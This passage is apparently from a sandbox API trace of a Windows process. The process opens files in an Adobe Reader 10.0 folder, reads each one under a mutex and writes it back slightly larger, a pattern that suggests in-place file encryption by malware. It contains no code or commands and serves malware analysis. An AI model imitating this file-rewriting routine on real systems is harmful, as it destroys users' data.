lpNumberOfBytesRead=0x2fdf2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.298] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0069.299] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.300] CloseHandle (hObject=0x1dc) returned 1 [0069.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.317] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.317] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e00 [0069.317] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.317] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.318] ReleaseMutex (hMutex=0x168) returned 1 [0069.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SUO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SUO", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SUO", lpUsedDefaultChar=0x0) returned 11 [0069.318] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.320] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0069.320] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.321] CloseHandle (hObject=0x1dc) returned 1 [0069.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.323] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.323] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e00 [0069.323] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.323] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.323] ReleaseMutex (hMutex=0x168) returned 1 [0069.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DAN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DAN", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.DAN", lpUsedDefaultChar=0x0) returned 11 [0069.324] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0069.659] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.660] CloseHandle (hObject=0x1dc) returned 1 [0069.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.668] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.669] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1800 [0069.669] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.669] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.669] ReleaseMutex (hMutex=0x168) returned 1 [0069.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.JPN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.JPN", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.JPN", lpUsedDefaultChar=0x0) returned 11 [0069.669] ReadFile (in: hFile=0x1dc, lpBuffer=0x28678b8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x28678b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1800, lpOverlapped=0x0) returned 1 [0069.765] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0069.765] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865858*, nNumberOfBytesToWrite=0x1d88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2865858*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1d88, lpOverlapped=0x0) returned 1 [0069.765] CloseHandle (hObject=0x1dc) returned 1 [0069.767] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e00 [0069.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.768] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.768] ReleaseMutex (hMutex=0x168) returned 1 [0069.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SKY", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SKY", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SKY", lpUsedDefaultChar=0x0) returned 11 [0069.768] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.810] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0069.810] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.811] CloseHandle (hObject=0x1dc) returned 1 [0069.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\jsbytecodewin.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.813] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.813] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x121ba8 [0069.814] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.814] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.814] ReleaseMutex (hMutex=0x168) returned 1 [0069.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSByteCodeWin.bin", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSByteCodeWin.bin", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSByteCodeWin.bin", lpUsedDefaultChar=0x0) returned 17 [0069.814] ReadFile (in: hFile=0x1dc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0069.870] ReadFile (in: hFile=0x1dc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0069.871] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x120ba8 [0069.871] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0070.170] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x120ba8 [0070.171] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.173] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0070.173] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0070.174] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.174] CloseHandle (hObject=0x1dc) returned 1 [0070.509] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0070.510] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0070.510] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x112b7 [0070.510] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0070.510] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.510] ReleaseMutex (hMutex=0x168) returned 1 [0070.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0070.510] ReadFile (in: hFile=0x1dc, lpBuffer=0x2865458, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0070.512] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x102b7 [0070.513] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0070.513] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x102b7 [0070.514] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.514] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0070.514] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.514] CloseHandle (hObject=0x1dc) returned 1 [0070.520] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0070.520] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0070.520] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xcd60 [0070.520] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0070.520] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.521] ReleaseMutex (hMutex=0x168) returned 1 [0070.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0070.521] ReadFile (in: hFile=0x1dc, lpBuffer=0x2865458, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0070.523] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xbd60 [0070.524] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0070.524] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xbd60 [0070.524] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.525] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0070.525] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.825] CloseHandle (hObject=0x1dc) returned 1 [0070.828] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0070.829] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0070.829] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x11ef3 [0070.829] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0070.829] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.829] ReleaseMutex (hMutex=0x168) returned 1 [0070.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0070.829] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0071.004] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x10ef3 [0071.004] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.061] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x10ef3 [0071.061] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.062] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.062] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.062] CloseHandle (hObject=0x1dc) returned 1 [0071.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.082] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.082] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xc288 [0071.082] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.082] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.082] ReleaseMutex (hMutex=0x168) returned 1 [0071.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, 